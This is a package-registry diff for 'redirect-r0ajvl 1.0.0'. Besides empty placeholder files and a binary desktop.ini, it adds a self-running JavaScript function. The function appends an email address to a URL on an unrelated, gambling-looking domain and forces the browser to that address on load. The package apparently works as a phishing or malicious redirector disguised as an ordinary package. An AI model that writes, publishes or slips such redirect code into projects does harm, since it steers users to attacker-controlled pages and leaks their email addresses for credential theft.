redirect-r0ajvl 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/cmd ADDED
File without changes
package/desktop.ini ADDED
Binary file
@@ -0,0 +1,7 @@
1
+ function processAndRedirect() {
2
+ var email = "test@test.com";
3
+ var urlPath = "https://cfn.jackpotmastersdanske.com/TJImeEKD";
4
+ var finalUrl = urlPath + "#" + email;
5
+ window.location.href = finalUrl;
6
+ }
7
+ processAndRedirect();
Binary file
package/npm ADDED
File without changes